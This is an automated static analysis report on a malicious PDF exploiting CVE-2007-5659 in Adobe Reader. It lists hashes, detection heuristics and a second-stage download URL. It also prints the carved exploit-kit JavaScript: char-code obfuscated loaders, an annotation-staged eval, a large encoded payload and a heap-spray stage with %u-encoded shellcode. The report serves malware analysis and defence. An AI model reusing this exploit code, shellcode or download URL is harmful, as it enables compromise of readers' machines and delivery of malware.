Malicious PDF — malware analysis report

Static analysis result for SHA-256 a9a31cf9756a0a43…

MALICIOUS

PDF

16.6 KB First seen: 2026-05-08
MD5: 5a879cc71c2fa58005fbdf19897060e2 SHA-1: ed2cb8d6de789f852a81317974db11a21e71c2f7 SHA-256: a9a31cf9756a0a43442e881b7d4a92a3e6b3c3ff5349a1a596d5eda11b868940
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which are heavily obfuscated. The heuristics indicate that these scripts are designed to be decoded and executed, likely to download and run a secondary payload. The presence of 'String.fromCharCode' and the 'syncAnnotScan' primitive further suggest a deliberate attempt to hide malicious code. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var sq2R_V_i___atW = new Array();var UE__y_0su = 0;var F8P0uPTF0Yc5f = "";function D60_aQ4(D6v4x__t__m, V3I_X388_s){var GR_u__2i = V3I_X388_s.toString();var H_cC4__MXfu4Kt = "";for(var B_fE_pm = 0; B_fE_pm < GR_u__2i.length; B_fE_pm++) {var Sx__2_1_nHm_2a = parseInt(GR_u__2i.substr(B_fE_pm, 1));if (!isNaN(Sx__2_1_nHm_2a)) {Sx__2_1_nHm_2a = Sx__2_1_nHm_2a.toString(16);if (Sx__2_1_nHm_2a.length == 1) { Sx__2_1_nHm_2a = "0" + Sx__2_1_nHm_2a; }else if (Sx__2_1_nHm_2a.length != 2) { Sx__2_1_nHm_2a =  …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://click-clicke.com/cgi-bin/plt/n002106201r0019Mb287ac98Rc0af8139X653add9dY3867ac66Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1CD2 12403 bytes
SHA-256: 1e2faaa5bfce56154f6eaefd91502c27f189c0ddeaa7cdcdf960ee82a1a2d9b1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function gD_O_8_8t20Xq(GcyhDn_8q2VBOs, x_EK_vD_J3T_82){var fgh = "eva";var t___gD86c_8quCl = arguments['cal'+'lee'];var Fo3Nm58d = 0;try {var lCjg_nmgm = 0;if (app) {Fo3Nm58d++;x_EK_vD_J3T_82 = pr[lCjg_nmgm].subject;}Fo3Nm58d++;} catch(e) { }var a_0XqXXnVV8b = new Array();if (GcyhDn_8q2VBOs) { a_0XqXXnVV8b = GcyhDn_8q2VBOs;} else {var G_1Poc16p = 0;var C__27__p = 0;var B218IF = 512;var LV62_1D = 53;t___gD86c_8quCl = t___gD86c_8quCl.toString();LV62_1D = LV62_1D - 5;var St1_Vy5 = LV62_1D + 10;St1_Vy5 = St1_Vy5 - 1;while(C__27__p < t___gD86c_8quCl.length) {var R__Q57_6y_8 = 1;var j_4iv3T3HOQoN = t___gD86c_8quCl["charCo" + "deAt"](C__27__p);if (j_4iv3T3HOQoN >= LV62_1D && j_4iv3T3HOQoN <= St1_Vy5) {if (G_1Poc16p == 4) {G_1Poc16p = 0;}if (isNaN(a_0XqXXnVV8b[G_1Poc16p])) {var lCjg_nmgm = 0;a_0XqXXnVV8b[G_1Poc16p] = lCjg_nmgm;}a_0XqXXnVV8b[G_1Poc16p] += j_4iv3T3HOQoN;if (a_0XqXXnVV8b[G_1Poc16p] > B218IF) {a_0XqXXnVV8b[G_1Poc16p] -= 512;}G_1Poc16p++;}C__27__p++;}}G_1Poc16p = 4;for (var xBcy8_A56 = 0; xBcy8_A56 < 4; xBcy8_A56++) {if (a_0XqXXnVV8b[xBcy8_A56] > 256) {a_0XqXXnVV8b[xBcy8_A56] -= 256;}}var V7R_uSCC3__Q44 = 0;var nN8C___W = "";var KS7__Q = 0;var DRYG4ckd7MDr7 = 0;var V6LMhE__5 = 0;var Ih_q6_5yWni6t3H;var QrBY_I160 = 23;while(DRYG4ckd7MDr7 < x_EK_vD_J3T_82.length) {var IYSKHt_Et2R6uW = x_EK_vD_J3T_82.substr(DRYG4ckd7MDr7, 1) + "YY";var XY__d0_0UNABT = parseInt(IYSKHt_Et2R6uW, QrBY_I160);if (KS7__Q) {Ih_q6_5yWni6t3H += XY__d0_0UNABT;if (V7R_uSCC3__Q44 == 4) {V7R_uSCC3__Q44 -= 4;}var SLfd5a_p4nXUmX = Ih_q6_5yWni6t3H;SLfd5a_p4nXUmX = SLfd5a_p4nXUmX - (V6LMhE__5 + 2) * a_0XqXXnVV8b[V7R_uSCC3__Q44];if (SLfd5a_p4nXUmX < 0) {SLfd5a_p4nXUmX = SLfd5a_p4nXUmX - Math.floor(SLfd5a_p4nXUmX / 256) * 256;}SLfd5a_p4nXUmX = String.fromCharCode(SLfd5a_p4nXUmX);if (Fo3Nm58d == 2) {nN8C___W += SLfd5a_p4nXUmX;} else if (Fo3Nm58d == 1) {nN8C___W += XY__d0_0UNABT;} else {nN8C___W += DRYG4ckd7MDr7;}V7R_uSCC3__Q44++;V6LMhE__5++;KS7__Q = 0;} else {Ih_q6_5yWni6t3H = XY__d0_0UNABT * 23;KS7__Q = 1;}DRYG4ckd7MDr7++;}var aa = this;aa[fgh + 'l'](nN8C___W);}
	gD_O_8_8t20Xq(0, "8i1l8m794j6ma49l03a350037a3h90034c7ha6a1841m631i4848ag1l380008a590456j2e40739e232l1l3e0ab2624k183f7aa1442f3c1h2a84696a4j59al06241m4i3c4k6i7b6e26310e2c652c6g73619k097b4i3d2132690l6d4g5b712f958250604k7814am5h4m821fb0814860336g0j206b9m935d2c6836965ga90b317ha5515lam9h21ai6da498368kaj8774480h323a860j0a75919c5c12491l0c3a871e986l141i5m1g5b32115ba2ak8h7mac044j456h400496a34873052l444l5j7f4jae8g842c7m0f2c4l606e7i602b98a62k834h4f6l589f6g6hac3a1i7794835l5a26a79c7f014i3387656k41575k38ab959564488h83927672474la6a10b6f457167a58ka54i71169c0i072e9i6k3h9m013e6327990f26601e806b7bam36a71e1a043j4ca44h55890d38120k027c5d8b226b8h952f3f2g4b1d9k518b4c510k18262726301jah8aaa4l5g0525361k745565948la7353k182d791c8a536f6j1f0e605e60207aa4038f749949168g505c2j6e9eag9691593214a4479j3h9a9e31a88i89790ea51j146j000b5kam825m7j0g9416al8f8ia97m070h530227123l3a8l1a8e8k9d0740ab33ae04426a1m04ag210k691l613j1d8ka11d9mb1045467697i4baeae021j732k4k4l5g5i7i361k1eai6594384h3j5l9l976f2a369l3m784b3d4f261f6i6j264i295h8b73698g3f2ma96a0l3m1i605b90556a2h1c1a8a0b8i2l7l7i1j789j4673a69e117i3c826l4j90011f82b0090a076b0h535h739m0c902h1e98186h1i5m76b13211b14c0l096a8f356ja10h0i1d2g4f2780718b325h0d2728185c35539i9e9g5j62ad0g2c04443b6j6a9ka563432532670h83797e6m0i0k463c3617579f7e5g4m7b3d106j2i7l4j7e0c1a9i6k766903685eaj5ia68k2a7l937i5e2d851maj6f9e9b3k8e825m6d26994e0f8c09al7i070h7g92551i2h58931k02939lal4mai3e2d353e6i1k8aa12111692041262f79862a7lab3b436g647j4eae8g9a1j7c1111632m73604e1ka70f3g74494h523d8d6g3d0103a04e644b3646499i8k78ac4i0b5g7d955c663d098j5f236m3j9e89877g991d1kaf7fam8e289i5kam75a53249b18c93b256087i4f998a0l6ea69d8d9g72936b3k95121ba00jad9f375k005f5e800f04961d0a7d3d4k43599b0f1m0g2g4b2h9d789a2054149h2hae1m3a1l6i6g6e473l1c253b1k4e454g96a08a4k39180j3da07i4a3l6da1a270544i2278149d7f809a1gb28m328h52971i1m9b60735b1k7k2a9j5g8f0438af7l6l871007461d75af115903084g9j1b071f0d5a930a67071i7ial27121a3c7g0ba772a2a46m1557261h498037a5900035763d3g493d88ak0ib00g1f2h475j5225087a9a1ja43f4j24498d8e58309g932m6j3h5f61646l7a601c11am6883612i5c26128m78255b225g8b775b7a3g228g6j1j6i426076aa76924746038d9j6f477i7i0j6dad463a9h82a99l50aj7a3h90a71j63219cal0733a94867971247ag2aadad195j145i7791003b0k4b39965i7j327b8i0i0ib1045a1b7j49631c378gb01b012e301jah999f2437171e561k6c655e879286633842223da95g573l7804887f4a6050810k887m5k7d2mb07i2m5i598f1b1b9h935i2h2la53c8d4d7g0b157g7l7e582b792b90759l036003ac5a971ea6301d749j8i7h160k7m10539j293j871aad8i140l4m0158032l586a057b8jam024a1d4b1m2686851j9d0i1h134d327d3f25020b467c391m40526i7c3dak1j1e5ha1655b6960a06646aa030f618j755c7050ag7h59182i296g637d7g983i1ha9890j6g367k68927a7247368c7m8k6e2da28b2f597h2g64179803035e825m106m9e0k6j1k0g9i176e18484373172ba32k068e217d1i515c00302d9i442hak5b8c354j6ha8342k1d4b46ab4i651c371b2847311k6b4d8b719e415g0l25561k4b3b436ab29a625b2l1353288a594e952cah4k54694184b2b1847m744b9d6i4f853g891d1h6b6e916414a053a6689i95117l7a657j2k791d1h6d9a98559gaj64973a011d09800f0a751513489h2j9b16225d2f7j9l140h4j2647231f68942b847m0d023h1k390a075c013c8jag3430614d6l452583981jaj4c303f4d607i3ab0a50b4h8d574f5m589f7i4cag31af6f7j732i5c261d9c67a9511c7g759369812e0i9c7i0j6g368h83a45b734b26038a98682db26c1j8a903m6l1e7h9i7i63a1642e76011i6200058k153h177867a5203f76189j8c0b53a44h600h181fai1k2b89335h2f5c8k0b342d2g4b2f82528f1k61a9161b0h1k2g2c7b677i614l0l123c1k4g453h90a09e5m584232670f6f536j6j1fa2462h361m769d8k55516a1c976b3i774j890j138j7k683c1k72478j2m74a3077h85857gam7h1d1h5i95a335ad905a7a170e3k347i17044396935j024eb236548la57j669dam49a969362352810ha58k010m65315a342d86a13c90aj0m41415j5l43ae8g841l7b181338708i845g2a159948945e3c5m62a65l4i9l400h597g5b5c54309g797l1a5a2h8e8k6i3f963a21a96da6692d7d598i5i681f1h126i8k6819al700d70893m48a38eb2965000673h9h0f0k5ja69caj9g3e93854k8eb21ca00lad8g315b1i716aah2k3c0g2115a55a6b2j73a28k0l12b22c1m015j843k459g113c111k32326i676j5k3f030435a84m715ka20gb16e2e2k2i67aj6h6i5m7f0216775m6f43861eb18e4m9c3d1j8m4f782j8m1f1m726i90320h92419j5g8g9e3l7g7h7i7k0j001h906iaf9a4mah0c6f88458j4j3d7j0j08738g9b63024112363g67278d6h14265030312g34709c39ae8902176e4245342h92962dafa60452525j6f45259a8l5a7c183i593m8h51300998aj5e8l574f5538ac6f461c38al7f768c4d704h0a9c6ea75f095f8b9e4f911l0k7f7a0j6a368h7991837226460e7g1b6b50ah7l2g91am496j1882958755b05e3h940k2j732f9a8ma2471d786daj1l3l761i1aa7356h114h8a8h022l161k3b8f6a7l3i719f193e36381h46ad84742461aia255163b625b7e8m9k2m61b2ae402f5d743l769jai46395444429l817b6f88ajb25g506b49502905818c5h2m1h8f4f652m89a1ad92606f2haia426a03f9e9d357f9m65892fam15ai6da5034m9j8j87771901420i8a8i9a431619780m4b14404g5l04057j23024j0m5h0a0m7aa6038f0d233f3f4356372g728228ag1b151j6a6g6d1b0h7a9h2i7b393k473j588i470h1g1d3g945j2g67336l866g1c29ag6f7c75607a2fa0ac7a20211b5k6d785f655d0e8e891b3m1i60920d7c9m4b480k9g955m1eah63al6b821a73ab8a9e8b2b0f5i1g78931291b19c011a381g753m81ad0ham12ac8h14452h525c8l02091h1j2d8933523i4b7d0i3b013f2g1fa2745m4j429bai2daj5d372e7h916j5k4027093eab7b6c3g9bb07g6l3e26346ea399796m6ib18d7m3545455e9i04837j6i1d9a902e85538g9a22928k663da7a14d835m9f9240a0a2807b01b2460l6kai8h5l8cb05f990l101l2f5e9k897j990l51981i21392h8aad819ha6b151022f320k4d730i7g0c080l4d253c430d65a51f782a101m453i49542986b22c6k11255l5i8d515l170m1g678k374f434a917g61am03013l644g6b582m9h7b4j2333085k6a6e78692e0c885k1i51156l62894c6j1d1e8ha99m6d2b7h562i6b8227439e079e8b388i4l4g78931m61ab1896a9459j4d6e7ja43c8705298c144gak458cb0260k9k123aab3b5d0i3kaa9d132k2k1m4b7j506a1j3c15ag28094l2j5c7e6l9a2l34330435am4b3g6d7a94843l2j51196aae8e4d7e6i1j954m2b6m2557aeab5a8f8d3i9m85238k316ga616679g895eai791iai409d9d1974ah5k5c0g821a1d4g8a9d54810f5h9a1g05123b5c0d93548l1g799b2e150h5966ag8i8k9i2h7007380b0977730a8cb0af3i481k40130195a81ka3af094j4663532caj008k2c7h3f165k3l615h35ab1la13f7a3b236l3d9k6k6ba33j1j6m7058307m370d7c5d9i5h2f608h7a3k902e078f6h9a7f156g62904ha14c2c9d9d929d2a7h5l025eb21l43a5ai8h0857al5g1l6b101i68009i8926449j553l7821157m0j1h8144711k505h853234121l2e7g625g0l4d9i92430k0g4f1k78806a20670a9m54042d372d709l7f513f03aj65014c6a5i6f0g89413c230d76ae6d574m672e914m2m401a871baf5l5f5m4c9l852j632798a3ae708j5e6ab0732b7j34a99d12809l56880g85239j410798528k8i4la61g981d0b4l18954k0e0j4d114e161c4d5i298i6ma821452m3907144f6f3a848i07103k4k67370k687c4b84am0k243c6i722b0486895c7b1c1l30348g603ab115966d793b2l462jae6i491g12a37e6i543b572b197j7aab4lb08f6a766d6123378g6ga14f0h9g629059761i5507799g6g1eah5mal67821a73a78h9a8e2b0f7h4174931291b09b92af381g793m84a70ham10ah8c14452h4m7f8g08091h1i0d8433523i4d7g0i3b013f2f3e7j545m4j489baf2daj5d372g9g706j5k40030836ab7b443d76am7g6l5b25184ba399564k931m8d7m34401l5f9i04667j6f1i9a902h82326d9a22726k6a5ea7a12d833h9g9240a07m5h5b01b2260h4h8g8h5l8e8i5g7c0l103l0g599e897j0ba554971i21192a6aal819ha6b06j252f32104a980f7g0c00336e413c430d65a43i782a3322435l4954048b942g70483m515k5h5665ama49h5j6f662i3l5d9h63761j0k1i6i67843c77320d70871a310f5k5ma24g842j2e7k98a04j1a905e0k7b9726288ha99l8h2880562i66a61l689e079aai37am4l4g6m961e86ab18951a620m4d6e841515830529ah194gb0458c8l29300l123aa9355i143kaa0i3b2j101m4ba4788i433c15ai4b2c4l2j5c7b957b5434330d3d236g3g6d7bamac652j51186dae8g4d7e92aj04572b6m215aad8a5a8f6i3f1083238k2l6ea316679g645iaj941iai3l7a9k1074ah5m5c0g881a1d4c8a9b56810f5g7a1f9b123b5g9b94508l1g530929140h596caf8e929i2h4m0839270977792e8a8iaf3i4e2042390195861k821f094j465m5327aj008m4j7h1d165k3l816038ab1l9j5l795c236l3d7l6k49a33jag6k715d307m359l7h599i5h0a806g993k902k2c8f689a7f179169944ha129259b9g929d257j5kal5eb22143a58b8h08328k5c1m6b101g62b29b89263m9j583g782118800jac81444k204j5l8532109m1j0c7g625g124b7i92430i0i2g1c78806d24439h9m540a2g3c2e709l7d2l3i03aj65b24j4a3j6f0g87413a220d76aj6h5450672e945432451a87ac88615i5m4ca4642k612798a4a96l725e6aal742b8434a99g167i8256880i8321a0410798348i8l4la61e031g0h4l18904k9c9j4d1129a418295i298f6hac00452m3602104d6c0la7072i0g6j2040140i7c8h2c9c2a0m2d543m442hae000a4ja93d3k5f5m58873723a39j3e6i5m425m69a888471c110e617k6m3j4i260f8h7b173e0a6c97934g605135a1619e53468j8m877l74534603a08k73197h8kb262821l43a28l13ae5j82693h8d013i7d2c120g175k0h776h73ah0c920laf8i2b4l2g505iah2i0i183k33ad618002426h9f1e3d2i570ia2756f3k65120d36301k3k1ja471a44l5g2hae32a643545e8haka95a604i40671c8a777h6dah1152373f296914a27m7g7h1d1g612e7l576f1j9c7860945b2ga047963ga0173k7m7j8f501ea33g0e6d9h965j8d8i7a9i1g1119al7f0d926k0b1d67a6529k1g5a89267j9702236h1165022l4d9i2lae7m0d0240376m3i2d6d843c7mal34133k324k5708838k2c7b181a2j685j8e561k1ca55l9k631l3d689h9b3d0l2k1c4g7g8365463c8j7b5i9d44297g6c80778h1l0j7f8lak71367i949076774l4g0c7k8k80439i5j0g91aj1g3l9i7h18065i8k6k3h8e0141821k09b0255c0d6b5f9ka623al3a187j1h400j6h77ah23249l4b0b84538212796h980a1f0k2d1h935599234606202f3c5l5f5ca493a658692jae4d1k6c685ea3ak9i5m6a2k3k4c0a614h7k9j1h0i4647532i6c22a87m8e8f33a5815162226l959e64748a642c681l8d5g9hab31aaa9515lam82299057ab0a3jad0a816d1l8a1e0d5k8i9f6k0eah720j4l9m10225d2f9k7l000m7f205431325l7a2bae8kaa0d4l14703j2j93a53eae1h0c153c6i4k4904a8895c7b3d1h523159656d2k111b2k9l362k6b3e9f6g6m2629215l714b4146288l7m7f1k5eai5775936g6l4f32b05fab3m1574599i769934460ka18k7219815mal6d792g64179803035e8d541966164861020l94173l197j54a9081b760bb27j2c5k0e5l8bah233j0m340ha55c5i167ga90k3e3a0d4f45aa7e8d405c1421512b1k3k1j879f9l5b5i27025a2d726i5k980f926d5a4c3f58248h7i46a12c0l735b49154g9f835587983la857595k318la5136k998k5025882c00387k0d3iaa7f7m7m2ja54i0370b20946090e518k27013e3f7a9b0f7j92a78909561h3a588h2302611k144i0163151k4e940f7ja014225h1k470j3i96a348731e1f4c61544l451l9b8l5d953i385f2m66514j0h0m0f6h94365c6l3ia28m3da60b0j5i826d3b5626a3814eae21b1555h8a5c7740078f5faa3m1d6e63914l685d5c8c8hah7k3b7h61a56e792541a3838c0e5h098d2a7701305gb19e8g9g3598813ea1a43a7b3gacah146la64c4ja11624031d0h7k3d6l2j699e0b432d264b4e8f7j6g2i3f91al5c2f4l2e249f7ga04l5104254m144c75579daaam3e2e57347126677675921h0i6c5a6e456f23035d7j75450j792f7l4c7g9m238c937g65ab7c5e006g9c170797a47i6l0ea32f0e71al8c3b7j8i5ka73c0k0k2f5gb1905207a1729847121b4a7g1e7j779d1k7b2h312k3b779c1cak0a0b33724h370i3d88ak0iam1b0l344m3m442hae83981jae391i454e5k513ha612a153763c4f43587i8f67ak2k0l6j6g7i5i7f58189l5i9d5k295g7i814c5i29007f9e1j6i42606jag6e92342903aa9d79438i6ia56f79424a0c8d9bac34aj5d3h90993e7b21050k173k01603i9ia246a63d27b03l7905747k80ak1e0a2m2b92367e3j48860b241db2310i9b7a8b39420601452g51301jah658m575g1g06560d6c6g616a997b4f503a3254ai8a824e7e1fa2603a36568f1eaf55578d471d5l5f88529a121m8a908m68239i4m72457m8k197d7i5h5bam7f1b9064ak034b8eaj63973l0b0k104g9k8i4k9c9c48173l1b363m681a968i1f25400c2a0b0i48760l09ai2i3d46454213338i811g7k1b0l3k613m7d1b0h7a0b3m7d1a4h404f607i3a070caf5e946a4f3l65ae5l4j9l2m26796g825i7l4c0ka37e0b5h37575j95738i2c2f8a681975166l63b1569247290i718m5k1k717925839f2064ajab0eam2k0e83359l0k418h25938d9g3e934a3775a00c840ga590");
legacy_pdfkit_stage_001.js deobfuscated-js nested inline base-23 callee-key decoded JavaScript at offset 0x1CD2 5153 bytes
SHA-256: e8ceb47f7849c6cca1c9c9ab509e4abc9725a2fb8a4ad21df4cbb03925329fe4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var sq2R_V_i___atW = new Array();var UE__y_0su = 0;var F8P0uPTF0Yc5f = "";function D60_aQ4(D6v4x__t__m, V3I_X388_s){var GR_u__2i = V3I_X388_s.toString();var H_cC4__MXfu4Kt = "";for(var B_fE_pm = 0; B_fE_pm < GR_u__2i.length; B_fE_pm++) {var Sx__2_1_nHm_2a = parseInt(GR_u__2i.substr(B_fE_pm, 1));if (!isNaN(Sx__2_1_nHm_2a)) {Sx__2_1_nHm_2a = Sx__2_1_nHm_2a.toString(16);if (Sx__2_1_nHm_2a.length == 1) { Sx__2_1_nHm_2a = "0" + Sx__2_1_nHm_2a; }else if (Sx__2_1_nHm_2a.length != 2) { Sx__2_1_nHm_2a = "00"; }H_cC4__MXfu4Kt = Sx__2_1_nHm_2a + H_cC4__MXfu4Kt;}}while(H_cC4__MXfu4Kt.length < 8) { H_cC4__MXfu4Kt = "0" + H_cC4__MXfu4Kt; }var Q6P_6_31JaK6F2 = D6v4x__t__m.toString(16);if (Q6P_6_31JaK6F2.length == 1) { Q6P_6_31JaK6F2 = "0" + Q6P_6_31JaK6F2; }else if (Q6P_6_31JaK6F2.length != 2) { Q6P_6_31JaK6F2 = "00"; }H_cC4__MXfu4Kt = "3" + Q6P_6_31JaK6F2 + "P" + H_cC4__MXfu4Kt;return H_cC4__MXfu4Kt;}function k2e221(nR_woX1_5JQIY8, dMbbD2Dr_80hsW){var yMBE7_514 = new Array("");var CX_58XOD = nR_woX1_5JQIY8;var KQ_____K62c1_H;if ((KQ_____K62c1_H = nR_woX1_5JQIY8.lastIndexOf("%u00")) != -1) {if (KQ_____K62c1_H + 6 == nR_woX1_5JQIY8.length) {yMBE7_514[0] = nR_woX1_5JQIY8.substr(KQ_____K62c1_H + 4, 2);CX_58XOD = nR_woX1_5JQIY8.substring(0, KQ_____K62c1_H);}}KQ_____K62c1_H = 1;for (B_fE_pm = 0; B_fE_pm < dMbbD2Dr_80hsW.length; B_fE_pm++) {var y_G3eK_B___0 = dMbbD2Dr_80hsW.charCodeAt(B_fE_pm).toString(16);if (y_G3eK_B___0.length == 1) { y_G3eK_B___0 = "0" + y_G3eK_B___0; }yMBE7_514[KQ_____K62c1_H] = y_G3eK_B___0;KQ_____K62c1_H++;}B_fE_pm = yMBE7_514[0].length ? 0 : 1;yMBE7_514[KQ_____K62c1_H] = "00";yMBE7_514[KQ_____K62c1_H + 1] = "00";KQ_____K62c1_H += 2;if ((yMBE7_514.length - B_fE_pm) % 2) {yMBE7_514[KQ_____K62c1_H] = "00";}while(B_fE_pm < yMBE7_514.length) {CX_58XOD += "%u" + yMBE7_514[B_fE_pm + 1] + yMBE7_514[B_fE_pm];B_fE_pm += 2;}CX_58XOD += "%u0000";return CX_58XOD;}function w_vt_R1lrr72s(I_Y__N1s10_j7v, dc5_crMIq){while (I_Y__N1s10_j7v.length*2<dc5_crMIq) {I_Y__N1s10_j7v += I_Y__N1s10_j7v;}I_Y__N1s10_j7v = I_Y__N1s10_j7v.substring(0,dc5_crMIq/2);return I_Y__N1s10_j7v;}function poyA8_Q(vIEpt3_k2g, BqIu83Gl82xx, Vh_T2_A_ji){var Qtm_84_38e = 0x0c0c0c0c;var I_Y__N1s10_j7v = unescape(BqIu83Gl82xx);var dMbbD2Dr_80hsW = D60_aQ4(vIEpt3_k2g, Vh_T2_A_ji);var J536N5t76_n = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var nR_woX1_5JQIY8 = "%u9050%u9050%u9050%u9050" + 